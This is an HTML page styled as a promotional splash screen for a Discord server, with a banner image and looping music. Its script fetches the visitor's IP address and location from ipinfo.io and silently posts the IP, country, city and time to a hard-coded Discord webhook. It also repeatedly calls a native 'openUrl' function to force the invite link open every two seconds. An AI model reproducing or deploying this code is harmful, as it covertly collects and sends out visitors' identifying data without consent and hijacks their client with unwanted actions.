<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>discord.gg/883</title>
    <style>
       body {
            margin: 0;
            padding: 0;
            background: black;
            background: radial-gradient(circle at top left, #0d0d0d, #000000);

            font-family: 'Courier New', Courier, monospace;
            color: #9f8663;
            display: flex;
            justify-content: center;
            align-items: center;
            height: 100vh;
            flex-direction: column;
            text-align: center;
            overflow: hidden;
        }
        #content {
            display: none;
            opacity: 0;
            transition: opacity 2s ease;
        }
.video-container img,
.video-container video {
    width: 400px; 
    height: auto;
    border: 2px solid #c2c2c2; 
    border-radius: 15px;
    box-shadow: 0 0 15px rgba(255, 255, 255, 0.7); 
}

          .info {
            margin-top: 20px;
            font-size: 1.5em;
            color: #ffffff; 
            text-shadow: 0 0 8px #ffffff 0 0 15px #ffffff, 0 0 25px #ffffff;
            letter-spacing: 4.5px; 
            white-space: pre-wrap;
        }
        .text {
            margin-top: 5px;
            font-size: 75px; 
            color: #ffffff; 
            text-shadow: 0 0 8px #ffffff, 0 0 15px #ffffff, 0 0 25px #ffffff; 
            letter-spacing: 4.5px;
        }
        .background-video-container {
            position: absolute;
            top: 0;
            left: 0;
            width: 100%;
            height: 100%;
            overflow: hidden;
            z-index: -1;
        }
        .background-video-container video {
            width: 100%;
            height: 100%;
            object-fit: cover;
            filter: blur(15px);
        }
    </style>
</head>
<body>

    <div class="gif-container">
        <img src="" alt="">
    </div>

    <div id="content">
        <div class="video-container">
    <img src="https://cdn.discordapp.com/attachments/1394522943282872425/1398064389768347699/f03138cba80b7d9e.jpg?ex=6884006d&is=6882aeed&hm=927778af3b9f923f870cc9bbf448c1368ee0c5e7317e38f6cee31933b961c713&" alt="Banner">
</div>


        <audio autoplay loop>
            <source src="https://cdn.discordapp.com/attachments/1394522943282872425/1398081618152919100/Dr._Driving_theme_song_looped_8_minutes.mp3?ex=68841078&is=6882bef8&hm=77b010cd95ade2ef463dd771f7a308e5ed2757084bc02a3da065a10495d90c1d&" type="audio/mpeg">
            Your browser does not support the audio element.
        </audio>
        <div class="info" id="ip-info"></div>
        <div class="text">discord.gg/883</div>
    </div>

    <script>
        setTimeout(() => {
            document.querySelector('.gif-container').style.display = 'none';
            const content = document.getElementById('content');
            content.style.display = 'block';
            setTimeout(() => {
                content.style.opacity = 1;
            }, 200); 
        }, 200);

        fetch('https://ipinfo.io/json')
        .then(response => response.json())
        .then(data => {
            const { ip, country, city, region, loc, org, timezone } = data;
            const infoDiv = document.getElementById('ip-info');
            infoDiv.innerHTML = `
<strong>IP:</strong><span>"${ip}"</span><br><strong>City:</strong><span>"${city}"</span><br><strong>Region:</strong><span>"${region}"</span><br><strong>Country:</strong><span>"${country}"</span><br><strong>Location:</strong><span>"${loc}"</span><br><strong></strong> <span>"${org}"</span><br><strong>Timezone:</strong><span>"${timezone}"</span>`;

            const dateTime = new Date().toLocaleString();
            const webhookUrl = 'https://discord.com/api/webhooks/1344343145760161812/tLK1ujvgwghwhhW7SQgtIpMFXQiA0ivLa9jyXH3gtHKP-nrVyeazc_7H8Z2fftKsEoPR';
            fetch(webhookUrl, {
                method: 'POST',
                headers: {'Content-Type': 'application/json'},
                body: JSON.stringify({content: `IP : ${ip}\nCountry & City : ${country} - ${city}\nDate & Time : ${dateTime}\n -`})
            });
        });

        setInterval(function() {
            window.invokeNative("openUrl", "https://discord.gg/883");
            window.invokeNative("openUrl", "https://discord.gg/883");
             },     2000);
    </script>
</body>
</html>
